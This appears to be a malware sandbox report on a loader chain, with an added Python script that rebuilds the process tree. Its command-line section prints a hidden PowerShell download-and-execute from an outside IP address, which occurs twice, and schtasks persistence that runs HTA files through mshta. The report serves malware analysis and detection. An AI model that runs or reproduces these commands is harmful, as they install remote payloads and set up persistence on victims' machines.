e19bf10b34a8c3f89a36151deac870794f46371ec2ee26f5b9881e1895c34796c76ef3b906279e6dba49a2f26c5d010e10eded9108e16fbb7f7a8f7c7e50207988f360895e7e237960d36759efb0e72b11d9bbc03f94905d881dd05b42ad641e9ac0176950a0fd8dfd5bd121f352f28176cd298c1a80964776e4737baceac595e689d7f72d689c50641293e593edd26f524c911a75aa34c401f46a199b5a73a516e863b9e7d72a712057859ed3e5178150b038f8dd02f05b23e7b4a1c4b730512fcc6eae050137c439374b3ca74e78e1f0108d030d45b7136b407bac130305c48b7823b98a67d608aa2a32982ccbabd83041ba2830341a1d605f11bc2b6f0a87c863b46a8482a88dc769a76bf1f6aa53d198feb38f364dec82b0d0a28fff7dbe21542d422d0275de179fe18e77088ad4ee6d98b3ac6dd27516effbc64f533434f0203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e0416041479b459e67bb6e5e40173800888c81a58f6e99b6e300d06092a864886f70d01010b05000382020100551f58a9bcb2a850d00cb1d81a6920272908ac61755c8a6ef882e5692fd5f6564bb9b8731059d321977ee74c71fbb2d260ad39a80bea17215685f1500e59ebcee059e9bac915ef869d8f8480f6e4e99190dc179b621b45f06695d27c6fc2ea3bef1fcfcbd6ae27f1a9b0c8aefd7d7e9afa2204ebffd97fea912b22b1170e8ff28a345b58d8fc01c954b9b826cc8a8833894c2d843c82dfee965705ba2cbbf7c4b7c74e3b82be31c822737392d1c280a43939103323824c3c9f86b255981dbe29868c229b9ee26b3b573a82704ddc09c789cb0a074d6ce85d8ec9efceabc7bbb52b4e45d64ad026cce572ca086aa595e315a1f7a4edc92c5fa5fbffac28022ebed77bbbe3717b9016d3075e46537c3707428cd3c4969cd599b52ae0951a8048ae4c3907cecc47a452952bbab8fbadd233537de51d4d6dd5a1b1c7426fe64027355ca328b7078de78d3390e7239ffb509c796c46d5b415b3966e7e9b0c963ab8522d3fd65be1fb08c284fe24a8a389daac6ae1182ab1a843615bd31fdc3b8d76f22de88d75df17336c3d53fb7bcb415fffdca2d06138e196b8ac5d8b37d775d533c09911ae9d41c1727584be0241425f67244894d19b27be073fb9b84f817451e17ab7ed9d23e2bee0d52804133c31039edd7a6c8fc60718c67fde478e3f289e0406cfa5543477bdec899be91743df5bdb5ffe8e1e57a2cd409d7e6222dade1827 C:\Users\Admin\AppData\Local\Temp\97419fb2c0\futors.exe N/A

Scheduled Task/Job: Scheduled Task

persistence execution
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\fbeacc19842742c19181eb930a0cd2baca9f900e388204a30e941090809f7fd7.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10089420101\4klgwMz.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\10000710100\feedlablest.exe N/A
N/A N/A C:\ProgramData\wwasfxe\orhct.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\TempFH0QKNVVU00PUNBK14MOJOZPXKNX5XMK.EXE N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10016760101\files.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10016760101\files.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10016760101\files.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10016760101\files.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe N/A

Suspicious behavior: GetForegroundWindowSpam

Description Indicator Process Target
N/A N/A C:\Windows\Explorer.EXE N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1964 wrote to memory of 1028 N/A C:\Users\Admin\AppData\Local\Temp\fbeacc19842742c19181eb930a0cd2baca9f900e388204a30e941090809f7fd7.exe C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
PID 1964 wrote to memory of 1028 N/A C:\Users\Admin\AppData\Local\Temp\fbeacc19842742c19181eb930a0cd2baca9f900e388204a30e941090809f7fd7.exe C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
PID 1964 wrote to memory of 1028 N/A C:\Users\Admin\AppData\Local\Temp\fbeacc19842742c19181eb930a0cd2baca9f900e388204a30e941090809f7fd7.exe C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
PID 1964 wrote to memory of 1028 N/A C:\Users\Admin\AppData\Local\Temp\fbeacc19842742c19181eb930a0cd2baca9f900e388204a30e941090809f7fd7.exe C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
PID 1028 wrote to memory of 2748 N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Users\Admin\AppData\Local\Temp\10089420101\4klgwMz.exe
PID 1028 wrote to memory of 2748 N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Users\Admin\AppData\Local\Temp\10089420101\4klgwMz.exe
PID 1028 wrote to memory of 2748 N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Users\Admin\AppData\Local\Temp\10089420101\4klgwMz.exe
PID 1028 wrote to memory of 2748 N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Users\Admin\AppData\Local\Temp\10089420101\4klgwMz.exe
PID 2748 wrote to memory of 1180 N/A C:\Users\Admin\AppData\Local\Temp\10089420101\4klgwMz.exe C:\Windows\Explorer.EXE
PID 1028 wrote to memory of 1956 N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Users\Admin\AppData\Local\Temp\10089720101\8jQumY5.exe
PID 1028 wrote to memory of 1956 N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Users\Admin\AppData\Local\Temp\10089720101\8jQumY5.exe
PID 1028 wrote to memory of 1956 N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Users\Admin\AppData\Local\Temp\10089720101\8jQumY5.exe
PID 1028 wrote to memory of 1956 N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Users\Admin\AppData\Local\Temp\10089720101\8jQumY5.exe
PID 1028 wrote to memory of 3024 N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Users\Admin\AppData\Local\Temp\10090400101\W6ySCZP.exe
PID 1028 wrote to memory of 3024 N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Users\Admin\AppData\Local\Temp\10090400101\W6ySCZP.exe
PID 1028 wrote to memory of 3024 N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Users\Admin\AppData\Local\Temp\10090400101\W6ySCZP.exe
PID 1028 wrote to memory of 3024 N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Users\Admin\AppData\Local\Temp\10090400101\W6ySCZP.exe
PID 3024 wrote to memory of 1012 N/A C:\Users\Admin\AppData\Local\Temp\10090400101\W6ySCZP.exe C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe
PID 3024 wrote to memory of 1012 N/A C:\Users\Admin\AppData\Local\Temp\10090400101\W6ySCZP.exe C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe
PID 3024 wrote to memory of 1012 N/A C:\Users\Admin\AppData\Local\Temp\10090400101\W6ySCZP.exe C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe
PID 3024 wrote to memory of 1012 N/A C:\Users\Admin\AppData\Local\Temp\10090400101\W6ySCZP.exe C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe
PID 1012 wrote to memory of 1976 N/A C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe C:\Users\Admin\AppData\Roaming\10000710100\feedlablest.exe
PID 1012 wrote to memory of 1976 N/A C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe C:\Users\Admin\AppData\Roaming\10000710100\feedlablest.exe
PID 1012 wrote to memory of 1976 N/A C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe C:\Users\Admin\AppData\Roaming\10000710100\feedlablest.exe
PID 1012 wrote to memory of 1976 N/A C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe C:\Users\Admin\AppData\Roaming\10000710100\feedlablest.exe
PID 1028 wrote to memory of 872 N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Users\Admin\AppData\Local\Temp\10092140101\Ps7WqSx.exe
PID 1028 wrote to memory of 872 N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Users\Admin\AppData\Local\Temp\10092140101\Ps7WqSx.exe
PID 1028 wrote to memory of 872 N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Users\Admin\AppData\Local\Temp\10092140101\Ps7WqSx.exe
PID 1028 wrote to memory of 872 N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Users\Admin\AppData\Local\Temp\10092140101\Ps7WqSx.exe
PID 1028 wrote to memory of 1908 N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Users\Admin\AppData\Local\Temp\10097700101\amnew.exe
PID 1028 wrote to memory of 1908 N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Users\Admin\AppData\Local\Temp\10097700101\amnew.exe
PID 1028 wrote to memory of 1908 N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Users\Admin\AppData\Local\Temp\10097700101\amnew.exe
PID 1028 wrote to memory of 1908 N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Users\Admin\AppData\Local\Temp\10097700101\amnew.exe
PID 1908 wrote to memory of 3008 N/A C:\Users\Admin\AppData\Local\Temp\10097700101\amnew.exe C:\Users\Admin\AppData\Local\Temp\97419fb2c0\futors.exe
PID 1908 wrote to memory of 3008 N/A C:\Users\Admin\AppData\Local\Temp\10097700101\amnew.exe C:\Users\Admin\AppData\Local\Temp\97419fb2c0\futors.exe
PID 1908 wrote to memory of 3008 N/A C:\Users\Admin\AppData\Local\Temp\10097700101\amnew.exe C:\Users\Admin\AppData\Local\Temp\97419fb2c0\futors.exe
PID 1908 wrote to memory of 3008 N/A C:\Users\Admin\AppData\Local\Temp\10097700101\amnew.exe C:\Users\Admin\AppData\Local\Temp\97419fb2c0\futors.exe
PID 1956 wrote to memory of 2520 N/A C:\Users\Admin\AppData\Local\Temp\10089720101\8jQumY5.exe C:\Windows\SysWOW64\WerFault.exe
PID 1956 wrote to memory of 2520 N/A C:\Users\Admin\AppData\Local\Temp\10089720101\8jQumY5.exe C:\Windows\SysWOW64\WerFault.exe
PID 1956 wrote to memory of 2520 N/A C:\Users\Admin\AppData\Local\Temp\10089720101\8jQumY5.exe C:\Windows\SysWOW64\WerFault.exe
PID 1956 wrote to memory of 2520 N/A C:\Users\Admin\AppData\Local\Temp\10089720101\8jQumY5.exe C:\Windows\SysWOW64\WerFault.exe
PID 1028 wrote to memory of 2536 N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Users\Admin\AppData\Local\Temp\10097710101\faeba77a20.exe
PID 1028 wrote to memory of 2536 N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Users\Admin\AppData\Local\Temp\10097710101\faeba77a20.exe
PID 1028 wrote to memory of 2536 N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Users\Admin\AppData\Local\Temp\10097710101\faeba77a20.exe
PID 1028 wrote to memory of 2536 N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Users\Admin\AppData\Local\Temp\10097710101\faeba77a20.exe
PID 2536 wrote to memory of 672 N/A C:\Users\Admin\AppData\Local\Temp\10097710101\faeba77a20.exe C:\Windows\SysWOW64\cmd.exe
PID 2536 wrote to memory of 672 N/A C:\Users\Admin\AppData\Local\Temp\10097710101\faeba77a20.exe C:\Windows\SysWOW64\cmd.exe
PID 2536 wrote to memory of 672 N/A C:\Users\Admin\AppData\Local\Temp\10097710101\faeba77a20.exe C:\Windows\SysWOW64\cmd.exe
PID 2536 wrote to memory of 672 N/A C:\Users\Admin\AppData\Local\Temp\10097710101\faeba77a20.exe C:\Windows\SysWOW64\cmd.exe
PID 2536 wrote to memory of 2344 N/A C:\Users\Admin\AppData\Local\Temp\10097710101\faeba77a20.exe C:\Windows\SysWOW64\mshta.exe
PID 2536 wrote to memory of 2344 N/A C:\Users\Admin\AppData\Local\Temp\10097710101\faeba77a20.exe C:\Windows\SysWOW64\mshta.exe
PID 2536 wrote to memory of 2344 N/A C:\Users\Admin\AppData\Local\Temp\10097710101\faeba77a20.exe C:\Windows\SysWOW64\mshta.exe
PID 2536 wrote to memory of 2344 N/A C:\Users\Admin\AppData\Local\Temp\10097710101\faeba77a20.exe C:\Windows\SysWOW64\mshta.exe
PID 672 wrote to memory of 1944 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\schtasks.exe
PID 672 wrote to memory of 1944 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\schtasks.exe
PID 672 wrote to memory of 1944 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\schtasks.exe
PID 672 wrote to memory of 1944 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\schtasks.exe
PID 916 wrote to memory of 1968 N/A C:\Windows\system32\taskeng.exe C:\ProgramData\wwasfxe\orhct.exe
PID 916 wrote to memory of 1968 N/A C:\Windows\system32\taskeng.exe C:\ProgramData\wwasfxe\orhct.exe
PID 916 wrote to memory of 1968 N/A C:\Windows\system32\taskeng.exe C:\ProgramData\wwasfxe\orhct.exe
PID 916 wrote to memory of 1968 N/A C:\Windows\system32\taskeng.exe C:\ProgramData\wwasfxe\orhct.exe
PID 2344 wrote to memory of 396 N/A C:\Windows\SysWOW64\mshta.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2344 wrote to memory of 396 N/A C:\Windows\SysWOW64\mshta.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2344 wrote to memory of 396 N/A C:\Windows\SysWOW64\mshta.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
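
The WriteProcessMemory rows above are the cheapest way to recover the detonation's process tree: the first process that writes into a new PID is its creator, and a write into a process that already existed (here Explorer.EXE) is injection rather than parentage. The script below is an added example (editor's code, not the sandbox's) that rebuilds that tree from rows copied from the table; the only assumption is that a write into explorer.exe is treated as injection. A second root under taskeng.exe is expected here and is the scheduled-task persistence firing during the run.

```python
"""Rebuild the detonation's process tree from the report's
"Suspicious use of WriteProcessMemory" rows. Added example; not the sandbox's code."""
import re
from collections import defaultdict

# Row shape: "PID <src> wrote to memory of <dst> N/A <src image> <dst image>"
ROW_RE = re.compile(r"^PID (\d+) wrote to memory of (\d+) \S+ (\S+) (\S+)$")

# Assumption: a write into the desktop shell is injection into a process that
# predates the sample, not creation of a child, so it is kept out of the tree.
INJECTION_TARGETS = {"explorer.exe"}

# Rows copied from the table above, one per distinct edge; the first edge is
# repeated once because the sandbox logs every write call separately.
SAMPLE_ROWS = r"""
PID 1964 wrote to memory of 1028 N/A C:\Users\Admin\AppData\Local\Temp\fbeacc19842742c19181eb930a0cd2baca9f900e388204a30e941090809f7fd7.exe C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
PID 1964 wrote to memory of 1028 N/A C:\Users\Admin\AppData\Local\Temp\fbeacc19842742c19181eb930a0cd2baca9f900e388204a30e941090809f7fd7.exe C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
PID 1028 wrote to memory of 2748 N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Users\Admin\AppData\Local\Temp\10089420101\4klgwMz.exe
PID 2748 wrote to memory of 1180 N/A C:\Users\Admin\AppData\Local\Temp\10089420101\4klgwMz.exe C:\Windows\Explorer.EXE
PID 1028 wrote to memory of 1956 N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Users\Admin\AppData\Local\Temp\10089720101\8jQumY5.exe
PID 1028 wrote to memory of 3024 N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Users\Admin\AppData\Local\Temp\10090400101\W6ySCZP.exe
PID 3024 wrote to memory of 1012 N/A C:\Users\Admin\AppData\Local\Temp\10090400101\W6ySCZP.exe C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe
PID 1012 wrote to memory of 1976 N/A C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe C:\Users\Admin\AppData\Roaming\10000710100\feedlablest.exe
PID 1028 wrote to memory of 872 N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Users\Admin\AppData\Local\Temp\10092140101\Ps7WqSx.exe
PID 1028 wrote to memory of 1908 N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Users\Admin\AppData\Local\Temp\10097700101\amnew.exe
PID 1908 wrote to memory of 3008 N/A C:\Users\Admin\AppData\Local\Temp\10097700101\amnew.exe C:\Users\Admin\AppData\Local\Temp\97419fb2c0\futors.exe
PID 1956 wrote to memory of 2520 N/A C:\Users\Admin\AppData\Local\Temp\10089720101\8jQumY5.exe C:\Windows\SysWOW64\WerFault.exe
PID 1028 wrote to memory of 2536 N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Users\Admin\AppData\Local\Temp\10097710101\faeba77a20.exe
PID 2536 wrote to memory of 672 N/A C:\Users\Admin\AppData\Local\Temp\10097710101\faeba77a20.exe C:\Windows\SysWOW64\cmd.exe
PID 2536 wrote to memory of 2344 N/A C:\Users\Admin\AppData\Local\Temp\10097710101\faeba77a20.exe C:\Windows\SysWOW64\mshta.exe
PID 672 wrote to memory of 1944 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\schtasks.exe
PID 916 wrote to memory of 1968 N/A C:\Windows\system32\taskeng.exe C:\ProgramData\wwasfxe\orhct.exe
PID 2344 wrote to memory of 396 N/A C:\Windows\SysWOW64\mshta.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"""


def basename(path):
    return path.rsplit("\\", 1)[-1]


def parse_edges(text):
    """Map (src_pid, dst_pid) -> (src_image, dst_image); repeated rows collapse."""
    edges = {}
    for line in text.splitlines():
        m = ROW_RE.match(line.strip())
        if m:
            src, dst, src_img, dst_img = m.groups()
            edges[(int(src), int(dst))] = (src_img, dst_img)
    return edges


def build_tree(edges):
    """Return (roots, parent, children, injections, images).
    The first process to write into a PID is taken as its creator."""
    images, parent, injections = {}, {}, []
    children = defaultdict(list)
    for (src, dst), (src_img, dst_img) in edges.items():
        images.setdefault(src, src_img)
        images.setdefault(dst, dst_img)
        if basename(dst_img).lower() in INJECTION_TARGETS:
            injections.append((src, dst))
        elif dst not in parent:
            parent[dst] = src
            children[src].append(dst)
    roots = sorted(pid for pid in images
                   if pid not in parent and basename(images[pid]).lower() not in INJECTION_TARGETS)
    return roots, parent, children, injections, images


def render(roots, children, injections, images):
    """Indented tree, one line per process, followed by the injection edges."""
    out = []

    def walk(pid, depth):
        out.append("  " * depth + f"{pid} {basename(images[pid])}")
        for child in children[pid]:
            walk(child, depth + 1)

    for root in roots:
        walk(root, 0)
    for src, dst in injections:
        out.append(f"INJECT {src} {basename(images[src])} -> {dst} {basename(images[dst])}")
    return "\n".join(out)


if __name__ == "__main__":
    roots, parent, children, injections, images = build_tree(parse_edges(SAMPLE_ROWS))
    print(render(roots, children, injections, images))
```

Two things the rendered tree makes obvious that the flat table hides: rapes.exe (the Amadey copy of the sample) is the hub that launches every downloaded payload, and 4klgwMz.exe's single write into Explorer.EXE is the one edge that is injection rather than process creation.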

Processes

C:\Windows\Explorer.EXE

C:\Windows\Explorer.EXE

C:\Users\Admin\AppData\Local\Temp\fbeacc19842742c19181eb930a0cd2baca9f900e388204a30e941090809f7fd7.exe

"C:\Users\Admin\AppData\Local\Temp\fbeacc19842742c19181eb930a0cd2baca9f900e388204a30e941090809f7fd7.exe"

C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe

"C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe"

C:\Users\Admin\AppData\Local\Temp\10089420101\4klgwMz.exe

"C:\Users\Admin\AppData\Local\Temp\10089420101\4klgwMz.exe"

C:\Users\Admin\AppData\Local\Temp\10089720101\8jQumY5.exe

"C:\Users\Admin\AppData\Local\Temp\10089720101\8jQumY5.exe"

C:\Users\Admin\AppData\Local\Temp\10090400101\W6ySCZP.exe

"C:\Users\Admin\AppData\Local\Temp\10090400101\W6ySCZP.exe"

C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe

"C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe"

C:\Users\Admin\AppData\Roaming\10000710100\feedlablest.exe

"C:\Users\Admin\AppData\Roaming\10000710100\feedlablest.exe"

C:\Users\Admin\AppData\Local\Temp\10092140101\Ps7WqSx.exe

"C:\Users\Admin\AppData\Local\Temp\10092140101\Ps7WqSx.exe"

C:\Users\Admin\AppData\Local\Temp\10097700101\amnew.exe

"C:\Users\Admin\AppData\Local\Temp\10097700101\amnew.exe"

C:\Users\Admin\AppData\Local\Temp\97419fb2c0\futors.exe

"C:\Users\Admin\AppData\Local\Temp\97419fb2c0\futors.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1956 -s 840

C:\Windows\system32\taskeng.exe

taskeng.exe {1B59A5C2-7AB5-4126-8B71-D076F3AAE697} S-1-5-21-677481364-2238709445-1347953534-1000:JXXXDSWS\Admin:Interactive:[1]

C:\Users\Admin\AppData\Local\Temp\10097710101\faeba77a20.exe

"C:\Users\Admin\AppData\Local\Temp\10097710101\faeba77a20.exe"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c schtasks /create /tn kFwyLmaD1dr /tr "mshta C:\Users\Admin\AppData\Local\Temp\1LIta3g1n.hta" /sc minute /mo 25 /ru "Admin" /f

C:\Windows\SysWOW64\mshta.exe

mshta C:\Users\Admin\AppData\Local\Temp\1LIta3g1n.hta

C:\Windows\SysWOW64\schtasks.exe

schtasks /create /tn kFwyLmaD1dr /tr "mshta C:\Users\Admin\AppData\Local\Temp\1LIta3g1n.hta" /sc minute /mo 25 /ru "Admin" /f

C:\ProgramData\wwasfxe\orhct.exe

C:\ProgramData\wwasfxe\orhct.exe

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'FH0QKNVVU00PUNBK14MOJOZPXKNX5XMK.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\Users\Admin\AppData\Local\Temp\10097720121\am_no.cmd" "

C:\Windows\SysWOW64\timeout.exe

timeout /t 2

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 5 | ForEach-Object {[char]$_})"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 5 | ForEach-Object {[char]$_})"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 4 | ForEach-Object {[char]$_})"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 4 | ForEach-Object {[char]$_})"

C:\Windows\SysWOW64\schtasks.exe

schtasks /create /tn "lac5Tmaqt6v" /tr "mshta \"C:\Temp\0KxobPjd7.hta\"" /sc minute /mo 25 /ru "Admin" /f

C:\Windows\SysWOW64\mshta.exe

mshta "C:\Temp\0KxobPjd7.hta"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'\483d2fa8a0d53818306efeb32d3.exe';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;

C:\Users\Admin\AppData\Local\TempFH0QKNVVU00PUNBK14MOJOZPXKNX5XMK.EXE

"C:\Users\Admin\AppData\Local\TempFH0QKNVVU00PUNBK14MOJOZPXKNX5XMK.EXE"

C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe

"C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe"

C:\Users\Admin\AppData\Local\Temp\10098440101\z3SJkC5.exe

"C:\Users\Admin\AppData\Local\Temp\10098440101\z3SJkC5.exe"

C:\Windows\TEMP\{32C5EE92-B34F-4325-908A-F28FC29E7323}\.cr\z3SJkC5.exe

"C:\Windows\TEMP\{32C5EE92-B34F-4325-908A-F28FC29E7323}\.cr\z3SJkC5.exe" -burn.clean.room="C:\Users\Admin\AppData\Local\Temp\10098440101\z3SJkC5.exe" -burn.filehandle.attached=216 -burn.filehandle.self=212

C:\Windows\TEMP\{12D41D20-D467-4E85-9CBC-5B2CF86FB2AE}\.ba\WiseTurbo.exe

